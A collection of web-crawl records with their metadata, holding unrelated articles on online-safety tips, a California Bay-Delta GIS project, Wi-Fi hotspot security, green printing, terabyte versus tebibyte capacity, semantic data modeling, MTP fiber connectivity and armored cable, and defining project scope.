To continue reading this article register now | <urn:uuid:040d5b5f-56cb-47ff-b82d-cec6bbce6839> | CC-MAIN-2017-04 | http://www.csoonline.com/article/3031021/security/cso50-2016-un-development-program-provides-cybersecurity-assistance.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560284405.58/warc/CC-MAIN-20170116095124-00405-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.905499 | 190 | 2.828125 | 3 |
Tips for Staying Safe Online
The online world can be a confusing—even intimidating—place, with new threats emerging on a regular basis. How can you keep yourself safe and still enjoy the benefits that the Internet brings? Armed with just a little knowledge, you can easily and effectively improve the security of your computer and your personal information. Here are some simple tips that will give you the freedom and confidence to take full advantage of the Internet:
Use anti-virus software, and keep it updated.
Computer viruses and Trojans are designed to steal your credit card information and passwords, take over your email and use it for spamming, or even record what you type on your computer. Using anti-virus software and keeping it up-to-date is the best protection against these threats.
Use a personal firewall, and keep it updated.
Hackers constantly create new ways to penetrate your computer. Installing a personal firewall creates a barrier that prevents hackers from accessing your information.
Create strong passwords and change them regularly.
Many people use simple passwords that are easy to remember but make it easy for hackers to gain access to your financial and personal accounts. Making your password more complex will keep you safer online. Think for example of a phrase or a poem and convert the first letters of each word in the phrase into your password.
Be aware of deceptive emails, pop-ups, and other online scams.
Online criminals will attempt to acquire your personal information by luring you to a website that looks legitimate, but is actually a fake site. If you receive any emails from an unfamiliar source, or any suspicious pop-ups, do not click on the links or open the attachment.
Check the security lock.
Sometimes, just the presence of a security lock alone is not proof enough that a website is genuine. You can verify a website is genuine by double clicking on the lock to display the website’s security certificate. If the name on the certificate and the address of the website do not match, then the website might be phony.
Limit the amount of personal information you share online.
Online criminals use social networking sites to gather information to answer the challenge questions most online services require in order to retrieve and change your password. Limit the amount of personal information you publicly share online.
Fraud is always on the move.
Phone scams are gaining popularity again. One type of scam involves phone calls from an automated call center asking you for sensitive information. You should never provide personal information to an unsolicited caller.
Check your online statements frequently.
In order to help ensure that you and your information stay safe, check your online account statements frequently. | <urn:uuid:8c18dc61-778c-4f1f-aad5-1813f5293e68> | CC-MAIN-2017-04 | https://www.emc.com/emc-plus/rsa-thought-leadership/identity-protection/staying-safe.htm | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560284405.58/warc/CC-MAIN-20170116095124-00405-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.895877 | 543 | 2.609375 | 3 |
Level of Gvt.: State, Federal
Function: Environmental protection
Problem/Situation: Too much data on Bay Delta
Solution: GIS helps organize and analyze data
Jurisdiction: California Department of Water Resources
Contact: Dept. Water Resources 916/653-7007.
By Alan Jones
California Department of Water Resources
To study the Northern California Bay-Delta ecosystem in depth and come up with a solution to the multiple and conflicting demands for development and preservation on it is nearly an impossible task - but one the California Department of Water Resources (DWR) must help to accomplish. The Bay-Delta includes rivers and streams which flow from the Sierra Nevada mountains to the Pacific Ocean near San Francisco. Monitoring and managing the huge area requires time, commitment and a new way of managing data with a Geographic Information System (GIS).
DWR's Division of Planning performs a variety of support tasks for Delta studies, including computer modeling, analysis and forecasting. But the data contributed by Planning staff is only a portion of what's available on the Delta and what's needed to tackle the region's difficult dilemmas. The question is how to manage enormous amounts of information from many different sources. To help with this Herculean task, a GIS database on the Bay-Delta ecosystem is being created by the Delta Planning Branch's Environmental Support Section.
"The GIS is one of many evolving tools that will help us manage the mass of complex data available," said Richard Breuer, an environmental specialist in Environmental Support coordinating the development of GIS with the University of California, Berkeley. "The system will help the department in working with other state and federal agencies to resolve Delta problems and make better decisions."
Planners will use this GIS to analyze data, make decisions and support those decisions, prepare environmental impact reports and statements, and monitor environmental mitigation in the Delta. They can import data from other public and private groups to build up the database, as well as add data gathered by DWR staff and other agencies working directly in the Delta, such as the state Department of Fish and Game, the State Lands Commission, and the U.S. Bureau of Reclamation.
"It also contains metadata," Breuer said of the GIS program. "That means the program will not only provide the facts but also the background behind those facts, such as: who collected them, what sampling method was used, are the data current and accurate? Metadata can help establish the credibility and significance of the data to be used for analysis."
Breuer prepared the agreement under which the UC Berkeley Center for Environmental Design Research will help develop the Bay-Delta GIS over the next two years. While several Division of Planning people are already familiar with GIS programs, Berkeley will train additional DWR staff to work with the new GIS.
How GIS Works
GIS works something like the human mind. It can take many sets of data and put them together in different combinations. For a researcher who knows what to look for, it can provide visual displays of the relationship between different data.
The technology, Breuer said, is different from other database systems because spatial, rather than linear, data is collected. Each bit of information - whether about wetland, habitat, distribution of a threatened species, location of a well, or land use - is linked by coordinates to the specific place where it exists in the real world. Features such as waterways, soil types or population density is stored in layers so analysts can pick and choose which data is observed.
GIS is a new way of assembling data and making it universally and instantly available. It's like being able to talk to everybody in the global village at once, and selecting specific individuals in the village to tell you what they know.
If an operator, for example, wants data about Twitchell Island, a few keystrokes and a map of the island appears on the PC or Macintosh. The operator can then call up layer after layer of information - presence of endangered plants, soil type, elevation, roads, wellheads, land use. Each set of data superimposes itself on the screen. The operator can also print out the map, or print out data in various forms, or erase layers and add new ones, such as populations, animal life, housing and Native American artifacts.
Putting together different layers of data will give planners a better way to determine and define relationships. The GIS can combine factors such as time, space, and correlations of data sets, and can "weight" different data to produce a variety of results. From example, land and water use analysts use the GIS to study changes in land use patterns over time. Using maps they created to show these patterns during specific periods, they can ask the system to calculate the changes that have occurred over specific areas.
"The GIS will not only automatically calculate the changes and give you the numerical data," explained Breuer, "the systems will also provide you with a map so you can visually look at the areas of changes."
The Delta, of course, is an extremely complex ecosystem. It is exceedingly important as a major Pacific Coast wetland and a water hub for most of California. The delta also contains cities, industries and farms; includes transportation routes, public services and utilities; and provides recreation. Because information is needed and available on all these areas, the problem becomes one of deciding how much data to include.
"If all the data were input at two-foot intervals, it would require gigabytes of storage and cost millions of dollars. It would get to the point where there was too much information to process," said Breuer. "The task has to be do-able. You have to consider the scale that's needed. For example, it's enough to know the location of a wetland within 30 feet. Surveyors would need higher precision, but for planning issues, that amount of information is more than adequate for our purposes."
The department is not pioneering with this program. GIS is already used by many local, state and federal agencies including the Army Corps of Engineers and the Soil Conservation Service to analyze Bay-Delta information.
Planning's Land and Water Use Section has been using GIS for two years for spatial analysis of Bay-Delta issues, using a system named GRASS. GRASS, developed by the Corps of Engineers' Construction Engineering Research Laboratory, will be the basis for the Delta Planning work as well. The new system will be able to access, search and download data from UC Berkeley's Center for Environmental Design Research database.
The GIS also holds databases for a number of other DWR programs, including statewide land-use patterns that note changes in agricultural patterns over the decades and rosters of endangered species.
With such a vast database, the GIS will prove its worth beyond its use by the department. In the near future, the system will be accessible to thousands more people via CERES, the California Environmental Resources Evaluation System. CERES, a program of the state Resources Agency, will catalog information about the state's rich and diverse natural and cultural resources and distribute it via the Internet. Using a software program called Mosaic, anyone with access to the Internet can tap into the system, which will also make data accessible from the National Biological Survey and University of California's Sequoia 2000 network.
"All this ready access to such a wealth of information will lead to more informed decision-making," said Breuer. "And for the Delta, it may mean finding some workable long-term solutions that will address all the issues and satisfy all the parties involved."
Reprinted with permission from "DWR News," the newsletter of the California Department of Water Resources. | <urn:uuid:d398d6bc-0937-4375-8982-c7ea341c8671> | CC-MAIN-2017-04 | http://www.govtech.com/magazines/gt/Delta-Mapping-With-GIS.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279657.18/warc/CC-MAIN-20170116095119-00223-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.936893 | 1,578 | 2.734375 | 3 |
During the Black Hat 2007 Conference, a quick display of hacker technology demonstrated just how secure –or not– Wi-Fi hotspots are. In the middle of a conference presentation, session identifiers and cookies were captured from the internet browser of a random user accessing an unsecured wireless signal. The result? The helpless audience member could only look on as his Gmail inbox was suddenly presented for all to see.
Though this was eye-opening for many, it shouldn’t be. Wireless networks have been unsecure for years; in 2006 the University of Cambridge surveyed 2,500 access points of Wi-Fi networks around the University and found 46% were unencrypted (1). An overall estimate puts that number even higher – around 95% (2).
The reason behind the high rate of unsecured hot spots is simple: “People just really don’t care about Wi-Fi security” (1). The general public doesn’t view unsecure networks as a problem. People commonly offer to share their connection with friends and neighbors, and log on to public hotspots.
Despite the past apathy regarding unsecured hotspots, there is clearly a reason to be concerned. Connecting to an unsecured network is an invitation for hackers to easily snoop through people’s inbox and cookies, putting an unsuspecting user at risk for data and identity theft.
Convenience of public Wi-Fi hotspots mistakenly puts security on the back burner. Few are willing to sacrifice checking their email in the library or a coffee shop due to the potential threat of a hacker. But increasingly, hackers are creating fake access points that appear to be real, easily deceiving wireless internet users.
“If you’re connecting to a hacker’s fake Access Point and
everything you send and receive is transmitted in clear
text with no encryption…Anyone who doubts that this is a
problem should ask themselves if they would post their email
account passwords … at the bottom of this blog or go in to
an airport and yell out their user account names and passwords
as loud as they can. If the answer is no then they should
be concerned with Hotspot security” (3).
Current Wi-Fi stats state that wireless internet use will only increase. Wireless users are expected to grow by over 970 million users in the next three years, bringing the number of Americans with wireless subscriptions up to 87% (4). By 2010 wireless internet use will double that of cell phone use (5).
These astounding figures should create some unease. The high number of unsecure connections increases the potential for data and identity theft, as well as the loss of control of sensitive information.
Though the new attitude towards Wi-Fi has recently shifted towards concern,
the low use of encryption is still a problem. Many wireless network products have included built-in security features that offer added protection or encryption,
but customers struggle with the setup, and the features go unused.
Setting up your own network
When setting up Wi-Fi at home, follow these guidelines to increase the security of the network:
• Change the default name of your access point (that it does not read Linksys, or Netgear, for example) that does not disclose your name, company, or location
• Make sure your Wi-Fi Protected Access (WPA) is enabled or turned on, and check often for security upgrades
• Change the default router password
• Disable remote access via the router
• Use MAC authentication to validate only a specific list of users allowed
to access your network
Browse at your own risk
If you connect to a public access point, there are fewer options. Simply put, unsecured Wi-Fi use is a major threat. By connecting to an unsecured wireless network, you are a sitting target for any interested hacker. Information passed through unsecured web pages is accessible. Is it worth sacrificing all the information within your inbox just to check your email?
Although there are problems created by unsecured wireless networks, options are available to protect emailed documents. It’s possible to create secure, encrypted documents that are invulnerable to hackers, when accessed over a wireless network. If you plan to work on an unsecured access point, using extra security on sensitive files will assist in guarding against the vulnerabilities created by using a hotspot.
by Ashley Westling | <urn:uuid:ecf507fc-205f-43af-9145-c049edbe92e3> | CC-MAIN-2017-04 | http://3tpro.com/dallas-wireless-access/unsecured-wi-fi-access-browse-at-your-own-risk | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280900.71/warc/CC-MAIN-20170116095120-00369-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.9275 | 904 | 2.78125 | 3 |
Cartridges, Recycleing and Multiple Pages Per Sheet
Printing N-Up (Multiple pages per sheet of paper)? Although not as universally useful as duplexing, the ability to print 2, 4, or more document pages on a single sheet of paper is a time honored way to save paper for draft output. The feature is particularly helpful for users looking to proof the layout of pages. Most printer drivers include this feature. Make sure your users know about it.The argument for using recycled paper is obvious. What may not be obvious is that not all printers can work reliably with it. If you want to take advantage of recycled paper in your company, make sure it's an acceptable media type for any printer you're considering. Ink Saver Mode One of the lesser known secrets about the ink-saver options in drivers is that for printers that offer these modes, most output looks just as good whether the ink-saver mode is on or off. In any case, when you're evaluating a printer, it's certainly worth looking for an ink-saver option and testing it to see if you can save ink without sacrificing quality. Ground versus Grown Toner can either be physically ground from larger chunks of material or chemically grown. The chemically grown variety is more energy efficient to produce -- by 25 to 35 percent according to Xerox. That's a little extra green bonus for printers that use grown toner. Cartridge Capacities Regardless of page yield, ink cartridges for any given printer are the same size, with the same amount of material. Give extra points to printers with higher capacity cartridges. Keep in mind too that if you have a printer with a choice of cartridges, using the high capacity cartridge will generate less waste for a landfill (and incidentally cost less per page, so it will also save money). Recycling and Cartridges If you count up the number of ink or toner cartridges you use over the lifetime of a printer, you may be appalled both by the sheer number of cartridges, and by how large a volume they would use up in a landfill. When evaluating a printer, ask about the percentage of recycled material in the cartridge, as well the percentage of recyclable materials (or, even better, reusable parts for remanufacturing the cartridges). You'll also want to make sure the manufacturer has a cartridge recycling program in place. One other thing: if you compare percentages of recyclable materials between cartridges from different printers, be sure the comparisons are indeed comparable; the percentage by volume may be very different than the percentage by weight. Recycling and Printers Some of the recycling questions for cartridges apply to the printer itself as well. When you're evaluating a printer, ask if the printer itself contains any recycled materials, and, if so, what percentage. Similarly, you should ask what percentage of the printer is made of recyclable materials (or reusable parts), whether the manufacturer has a recycling program, and whether there is any out of pocket cost to your company for recycling. | <urn:uuid:71e891c5-2ff0-4f05-b08e-3b5b7e7e8c30> | CC-MAIN-2017-04 | http://www.eweek.com/c/a/Green-IT/How-Green-is-My-Printer/1 | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279933.49/warc/CC-MAIN-20170116095119-00490-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.93091 | 610 | 2.890625 | 3 |
The Australian cricket team is using wearables to help improve its bowling capabilities.
The team is using technology that’s much more usually found in a military context in a wearable that will help coaches understand the finer details of its bowling prowess.
Wearables used to track bowling
The wearable can track an individual bowler’s performance, monitoring metrics like speed and trajectory. They run algorithms to help understand how fatigue can affect performance.
Bowlers spend huge amounts of time practicing and even the slightest loss of performance ability can cost the team dear in terms of runs. So being able to understand the factors that might affect individual bowler’s performance can help understand how to ensure they remain at the peak of their powers during a game.
A better understanding of individual bowler’s performance can help boost their training regime and prevent injuries. It isn’t just cricket that can benefit. The same research group is also helping the Wales rugby team, for example.
The wearable, developed by sports scientists at the Australian Catholic University (ACU), incorporates an accelerometer, gyroscope and magnetometer. These are technologies more usually found in missiles and spacecraft. In this context, they are used to allow the wearable to track a bowler’s movement thanks to an algorithm developed by the sports scientists.
Wearables and IoT in sport
This is by no means the only example of wearables infiltrating professional sports, with football and cricket clubs in particular using fitness trackers and other devices to see how their stars are performing.
Motor sports, like Formula One, are also now using Internet of Things sensors and platforms to monitor how their cars are faring in real-time, bringing in their drivers at exactly the right time so ensure the team has the best chance of winning. | <urn:uuid:38c1765a-7ec4-4723-8bc8-f58042875e88> | CC-MAIN-2017-04 | https://internetofbusiness.com/australian-cricket-wearables/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281426.63/warc/CC-MAIN-20170116095121-00122-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.957536 | 369 | 2.796875 | 3 |
Base-2 connectivity is a common type of fiber optic link in today’s 10G network, such as LC duplex or SC duplex connections. With Base-2 connectivity, the fiber links are based on increments of two fibers. However, this kind of connectivity can not meet the demands of 40G links for the reason that numerous 2-fiber patch cords in the data center will result in an unmanageable, unreliable mess. Therefore, Base-12 and Base-8 connectivity are introduced successively to develop a modular, high density, structured cabling system for 40G network. Then, which is more suitable for the 40G links, Base-8 or Base-12 connectivity?
This part will give a brief introduction to Base-12 connectivity and Base-8 connectivity respectively.
Inspired by the fact that the TIA/EIA-568A fiber color coding standards are based on groups of 12 fibers, it makes sense that high density connectivity can be based on an increment of the number 12. Thus the 12-fiber MTP connect and Base-12 connectivity were born in the mid-1990’s. In a Base-12 system, Base-12 connectivity makes use of links based on increments of 12 fibers with 12-fiber MTP connectors (as shown in the following figure).
Due to the quickly-changing technology associated with transceivers, switches and servers, data centers that want to keep up may need to use Base-8 connectivity. This is because the present, near future, and long term future is full of transceiver types which are based on either Base-2 or Base-8 connectivity. The Base-8 system still uses the MTP connector, but the links are built in increments of 8 fibers (as shown in the following figure). Thus there are 8-fiber trunk cables, 16-fiber trunk cables, 24-fiber trunk cables and so on.
It is known to us that transmission at 40G is mainly based on using eight fibers in the link–four for transmitting and four for receiving at 10G (as shown in the following figure). In addition, QSFP transceivers and MTP connectors are commonly used in the 40G network. Thus we can use Base-12 connectivity and Base-8 connectivity to connect to the QSFP ports.
If Base-12 connectivity is used in the 40G network, it is easy to figure out that plugging a 12-fiber connector into a QSFP transceiver only requiring eight fibers means four fibers are being unused. Thus, there appears Base-12 to Base-8 conversion modules or harnesses to enable the full utilization of the backbone fiber. The followings are three common solutions of Base-12 connectivity for 40G network:
Seen from the above picture, there are four unused fibers in solution 1, which leads to a significant and costly loss in fiber network utilization; solution 2 and solution 3 add additional MTP connectors and additional insertion loss into the whole link. In this case, Base-12 connectivity is not the optimal solution in 40G network both for cost and link performance reasons.
Unlike Base-12 connectivity, Base-8 connectivity enables 100% fiber utilization for QSFP transceivers without any additional cost and insertion loss of Base-12 to Base-8 conversion devices. And its cabling is much more simple and flexible (as shown in the following figure). The imperfection of Base-8 connectivity is that it does not provide as high connector fiber density as that of Base-12 connectivity.
Though Base-8 connectivity is superior to Base-12 connectivity in some aspects, both Base-8 and Base-12 connectivity will be used in the data center for many years to come. In fact, Base-8 connectivity isn’t an universal solution and Base-12 connectivity in some cases may still be more cost-effective. The following table clearly shows the benefits of Base-8 connectivity and Base-12 connectivity:
|Benefits of Base-8 Connectivity||Benefits of Base-12 Connectivity| | <urn:uuid:fb730658-0b6b-4043-9428-75eb9bb751dc> | CC-MAIN-2017-04 | http://www.fs.com/blog/base-8-or-base-12-connectivity-which-is-better-for-40g-network.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560282937.55/warc/CC-MAIN-20170116095122-00030-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.929901 | 835 | 2.890625 | 3 |
Armored cable (just as its name implies, wrapped a layer of protective “armor” outside of the fiber optic cable) is mainly used for protecting fiber optic cable against rodent, moisture and other requirements. In the design of armored fiber optic cable, the outer sleeve which is usually made of plastic, such as polyethylene, provides protection against solvents, abrasion and etc. The next layer between the sleeve and the inner jacket is an armoring layer of materials that are quite difficult to cut, chew, and burn. In addition, this armoring material also prevent the fiber cable being stretched during cable installation. Ripcords are usually provided directly which under the armoring and the inner sleeve to aid in stripping the layer for splicing the cable to connectors or terminators. The inner jacket is a protective and flame retardant material to support the inner fiber cable bundle. The inner fiber cable bundle includes strength members, fillers and other structures to support the fibers inside. There are usually a central strength member to support the whole fiber cable.
Armored fiber cable can be used for indoor applications and outdoor applications. An armored cable typically has two jackets. The inner jacket is surrounded by the armor and the outer jacket or sheath surrounds the armor.
An armored cable used for outdoor application, is typically a loose tube construction designed for direct burial applications. The armor is generally a corrugated aluminum tape surrounded by an outer polyethylene jacket. This armor is generally a corrugated aluminum tape surrounded by an outer polyethylene jacket. This combination of outer jacket and armor protects the optical fibers from gnawing animals and the damage that can occur during direct burial installations.
Armored cable used for indoor applications may feature tight- buffered or loose-buffered optical fibers, strengths members, and an inner jacket. The inner jacket is commonly surrounded by a spirally wrapped interlocking metal tap armor. This type of armor is rugged and provides crush resistance. These cables are used in heavy traffic areas and installations that require extra protection, including protection from rodents.
When you are going to terminating your owm fiber, should know that:
Indoor interlocking fiber has a 900 size buffer, the loose tube has a smaller size 250. The loose tube smaller size benefits the manufacturers in the making the cables. The smaller size allows for an overall smaller diameter of the tube inside the cable, this goes a long way in higher strand count cables, especially considering you only get 12 strands of fiber per tube. If you are going to terminate a “loose tube” fiber cable don’t forget you need fan out kits, which can builds your 250 size to a 900 and also adds strength and durability to that 250 size. | <urn:uuid:11130b5a-468f-4d50-bfee-f15dfa0ffd7c> | CC-MAIN-2017-04 | http://www.fs.com/blog/armored-fiber-cable.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279189.36/warc/CC-MAIN-20170116095119-00426-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.922079 | 557 | 3.171875 | 3 |
Not surprisingly, usable capacity is a key metric by which customers buy storage, what may be surprising however is how poorly it is understood even within the storage community. Before we get too far I think it's worth explaining what a Terabyte is. "Isn't 1TB just one trillion bytes?" That is a perfectly reasonable conclusion to draw - tera is the standard prefix for trillion in base 10. The thing we need to remember that computers don't do decimal (base 10) math like we do, they do binary (base 2) math. As a computer understands it, 1TB is 240, or 1,099,511,627,776 bytes. Similarly, 1GB is actually 230, or 1,073,741,824 bytes.
Surely then when one buys a 6TB drive in Nimble array or from the local electronics store it must contain 6,597,069,766,656 bytes right? Wrong. If you refer to the specifications of nearly any disk on the market today you'll see the capacity footnoted with text something like "1 One gigabyte, or GB, equals one billion bytes and one terabyte, or TB, equals one trillion bytes when referring to drive capacity". Technically this is correct, since the prefixes 'giga' and 'tera' do describe billions and trillions, but it falls 597,069,766,656 bytes short of the expectation. Interestingly, system memory has always been marketed in capacities based on a power of 2 as a result of the way it is addressed, meaning that this capacity difference will only ever apply to disks.
So now let's see how the gap magnifies as the scale gets bigger. The table below shows how the ratio between SI units (standard mega, giga prefixes in base 10) compares with binary units; it is based on a wikipedia article here. What we can see from the table is that the ratio between SI units (standard base 10 mega, giga, tera, peta) and binary units (base 2) grows as the units grow bigger. A 1TB disk that you buy today actually contains a little over 931GB of space. If we could manufacture a 1PB disk, it would contain something like 909TB of space.
|Multiples of bytes|
|SI decimal prefixes||IEC binary prefixes|
|kilobyte (kB)||103||210||0.9766||kibibyte (KiB)||210|
|megabyte (MB)||106||220||0.9537||mebibyte (MiB)||220|
|gigabyte (GB)||109||230||0.9313||gibibyte (GiB)||230|
|terabyte (TB)||1012||240||0.9095||tebibyte (TiB)||240|
|petabyte (PB)||1015||250||0.8882||pebibyte (PiB)||250|
|exabyte (EB)||1018||260||0.8674||exbibyte (EiB)||260|
|zettabyte (ZB)||1021||270||0.8470||zebibyte (ZiB)||270|
|yottabyte (YB)||1024||280||0.8272||yobibyte (YiB)||280|
As you can see above, a new naming convention has been created to describe storage capacity in binary terms. So a terabyte is actually not a terabyte, but rather a tebibyte or TiB. Sometimes I feel like the only guy using the term; that may be why I feel like I'm having this conversation all the time.
To make matters worse, in enterprise storage systems there is additional overhead consumed by things like storage system meta data and array system software. In some cases this additional overhead can consume more than 10% of the purchased capacity in TiB. We have all seen the aggregate effect of both the TB to TiB short-change and the system overhead with things like mobile devices. The screenshot below is from the "About" screen on my iPhone (236 apps! I should delete some...). The 64GB model has just 55.9GiB usable after binary conversion and reserving space for the Operating System. Ironically Apple doesn't bother with the GiB prefix either.
Another reality of modern storage systems is that they tend to have a soft capacity limit beyond which performance will begin to suffer in addition to a hard capacity limit where no more data can be stored. In many cases the soft limit is as low as 60-80% of the system's true capacity further limiting the true usable capacity of that system. For some use cases this performance threshold won't matter; if you're archiving data you want to store every last possible byte without concern for performance implications. For a lot of use cases though guaranteeing that performance doesn't degrade will be critical, and it is worth understanding.
I doubt there's any changing the disk industry at this point, but you can challenge your enterprise storage system suppliers to tell you about the true usable capacity of their system in tebibytes after accounting for system overhead and performance thresholds - and when they ask what a tebibyte is (and they likely will), send them here. I've helped my customers decode the real capacity of my competitors systems while those competitors struggled to accurately describe a terabyte | <urn:uuid:2404a072-3f63-48a0-8cf6-175f58fa55f2> | CC-MAIN-2017-04 | https://connect.nimblestorage.com/people/rdm/blog/2015/07/07/what-is-a-terabyte | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279248.16/warc/CC-MAIN-20170116095119-00270-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.900581 | 1,156 | 3.421875 | 3 |
Enterprise data modeling has remained an arduous, time-consuming task for myriad reasons, not the least of which is the different levels of modeling required across an organization’s various business domains.
Data modelers have to consider conceptual, logical and physical models, in addition to those for individual databases, applications, and a variety of environments such as production and post-production. Oftentimes, the need to integrate new sources or to adapt to changing business or technology requirements exacerbates this process, causing numerous aspects of it to essentially begin all over again.
Enterprise data modeling is rendered much more simply with the incorporation of semantic technologies—particularly when compared to traditional relational ones. Nearly all of the foregoing modeling layers are simplified into an evolving semantic model that utilizes a standards-based approach to harmonize modeling concerns across an organization, its domains, and data environments.
Moreover, the semantic approach incorporates visual aspects that allows modelers to discern relationships between objects and readily identify them with a degree of precision that would require long periods of time with relational technologies.
“Semantics are designed for sharing data,” Franz CEO Jans Aasman reflected. “Semantic data flows into how people think.”
The crux of the semantic approach to data modeling is in the technology’s ability to define relationships between data and their different elements. In a standards-based environment, data objects are given specific descriptions courtesy of triples that are immensely useful in the modeling process. “The most important thing in semantic modeling is that everything is done completely declaratively,” Aasman revealed. “So instead of thinking about how you do things, you think about what you have.” The self-describing nature of triples is integral to semantic models because it allows those models to determine the relationships between different data elements. “You are very explicit about the relationships between objects in your data, so semantic modeling is far more like object-oriented modeling than relational database modeling,” Aasman said. Those relationships, which are easily visualized in an RDF graph, function as the building blocks of semantic models. Additionally, there are no schema limitations in a standards-based environment, which saves time and effort when modeling across applications, domains, or settings—which is required for enterprise data modeling.
The issue of schema is critical to conventional data modeling, particularly when incorporating additional requirements or new data types and sources. Semantic models are based on standards that any type of data can adhere to, so that there is “a standardized semantic model across many different data sources,” Paxata Chief Product Officer Nenshad Bardoliwalla said. All data can conform to the conventions of semantic models. Thus, when updating those models with additional requirements, there are fewer steps that data modelers have to go through. In relational environments, if one wants to incorporate a new data source into a data model of three other data sources, one would have to make adjustments to all of the databases to account for the new data types. Frequently, that re-calibration pertains to schema. In a standards-based environment, one would simply have to alter the new data source to get it to conform to the semantic model—which saves time and energy while expediting time to action. “Because we don’t have to redefine the schema all the time, it’s easier to use semantic technology,” Aasman remarked. “But it’s not impossible in a relational world.”
The Importance of Vocabularies
According to TopQuadrant CTO Ralph Hodgson, the precision of expression in semantic models—which allows organizations to model aspects of regulatory requirements and other governance necessities—is possible because the semantic model is “the model that is the most expressive thing that we have today. You don’t do that with an object model, you don’t do it in UML, you don’t do it with an entity relationship model, you don’t do it in a spreadsheet. You do it with a formalism that allows you to express a rich set of relationships between things.”
Nonetheless, enterprise data modeling is abetted in a semantic environment with vocabularies and systems for unifying terms and definitions throughout the enterprise. These technologies assist with the modeling process by ensuring clarity among all of the terms that actually mean the same things, yet are expressed differently (such as spellings, subsidiaries of companies, names, etc.). The result is that “you’re using the same word for the same thing,” Aasman maintained.
One can attempt to model most facets of terminology and their meanings. However, there are specific semantic technologies that address these points of distinction and commonality much faster to actually aid existent semantic models and ensure points of clarity between different data types, sources, and other characteristics of enterprise data modeling. “When we talk about how do you actually link and contextualize data and develop a data lake and its relationships, those taxonomies and vocabularies are actually central to being able to do that effectively,” Cambridge Semantics VP of Solutions and Pre-Sales Ben Szekely observed.
Modeling Enterprise Data
Perhaps the easiest way to facilitate enterprise data modeling is with the incorporation of an organization’s entire data into an RDF graph. Smart data lakes provide this capability in which all data assets are linked together in a graph with a comprehensive semantic model that quickly adds new sources and requirements. “The ability to do semantics is essentially the ability to create an enterprise graph of the entire enterprise and its information,” Cambridge Semantics VP of Marketing John Rueter said. “Up until now it’s been done at a departmental level.” Facets of regulatory compliance, data governance, and other organizational particulars can all coalesce into such an inclusive model, which provides a monolithic framework for the fragmented concerns of the different layers of modeling that have traditionally monopolized the time of data modelers. In these instances, the majority of the preparation work for modeling is done upfront and simply requires that additions conform to ontological model requirements.
Enterprise data modeling is considerably simplified with smart data approaches. Modelers can largely account for all of the disparate layers of modeling in a single semantic model that is supported by requisite vocabularies and terminology definitions. Furthermore, that model is based on standards that allow additional sources or requirements to mesh with it by adhering to those standards. Improvements in analytics and data discovery are just some of the many benefits of this approach, which saves substantial time, effort, and cost. “You can ask the data what’s the relationship between things, rather than making guesses and asking the data is your guess correct,” Cambridge Semantics VP of Engineering Barry Zane commented.
When one considers that such data can encompass all enterprise information assets, the potential impact of such insight—both for data modelers that facilitated it and for business users that perform better with it—is nothing short of transformative. “People in the world of semantics make sure that their models are entirely self descriptive and self explanatory,” Aasman stated. “There’s far more emphasis on being very clear about the relationships between types of objects.” | <urn:uuid:363ad5b1-66b0-4d61-a98c-d4783ea26532> | CC-MAIN-2017-04 | https://analyticsweek.com/content/enterprise-data-modeling-made-easy/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280239.54/warc/CC-MAIN-20170116095120-00022-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.927802 | 1,514 | 2.59375 | 3 |
As a project manager, you'll need to define project scope no matter what methodology you choose to use.
Defining what is needed is the first step toward establishing a project timeline, setting of project goals and allocating project resources. These steps will help you to define the work that needs to be done - or in other words, define the scope of the project. Once this is defined, you'll be able to allocate tasks and give your team the direction they need to deliver the project on time and on budget.
Read more in project management
Understand the project objectives
In order to define the scope of a project, it is necessary to first establish the project objectives. The objective of a project may be to produce a new product, create a new service to provide within the organisation, or develop a new bit of software. There are any number of objectives that could be central to a given project - and it is the role of the project manager to see that their team or contractors deliver a result that meets the specified functions and features.
How do you define the project scope?
The work and resources that go into the creation of the product or service are essentially the things that frame the scope of the project. The scope of the project outlines the objectives of the project and the goals that need to be met to achieve a satisfactory result. Every project manager should understand how to define the project scope and there are some steps that can be followed when doing this.
Steps for defining the scope of a project
To define a project scope, you must first identify the following things:
- Project objectives
Once you've established these things, you'll then need to clarify the limitations or parameters of the project and clearly identify any aspects that are not to be included. In specifying what will and will not be included, the project scope must make clear to the stakeholders, senior management and team members involved, what product or service will be delivered.
Alongside of this, the project scope should have a tangible objective for the organisation that is undertaking the project. The purpose may be to create a better product for a company to sell, upgrade a company's internal software so that they can deliver better service to their customers or to create a new service model for an organisation. These things are integral to defining the project scope, because they will play a part in how project methodologies are applied to the project to bring it to completion.
As a project manager, understanding and being able to define project scope will give you a focus and sense of purpose when executing the project. Understanding the scope provides you with the foundations for managing project change and risk management. It enables goal setting and a timeline to work towards, as well as key points for reporting on the progress of the project to senior management and other stakeholders.
Project management recommended reading:
- How to create a risk register
- Risk and project management go hand in hand
- Project management for the small business
- The project management survival toolkit
- Understanding project management processes and tools to drive success
- How to tailor your presentation to the audience
- How to approach a project
- The trouble with continuous multi-tasking
- Communication risks within and around a virtual team
- An objective methodology to project prioritisation
- Program & project manager power – What are your most important traits to achieve success
- Anatomy of an effective project manager
- The unspoken additional constraint of project management
- How project managers can help their companies 'go Green'
- What makes an effective executive?
- Minimising bias of subject matter experts through effective project management
- Program and project manager power
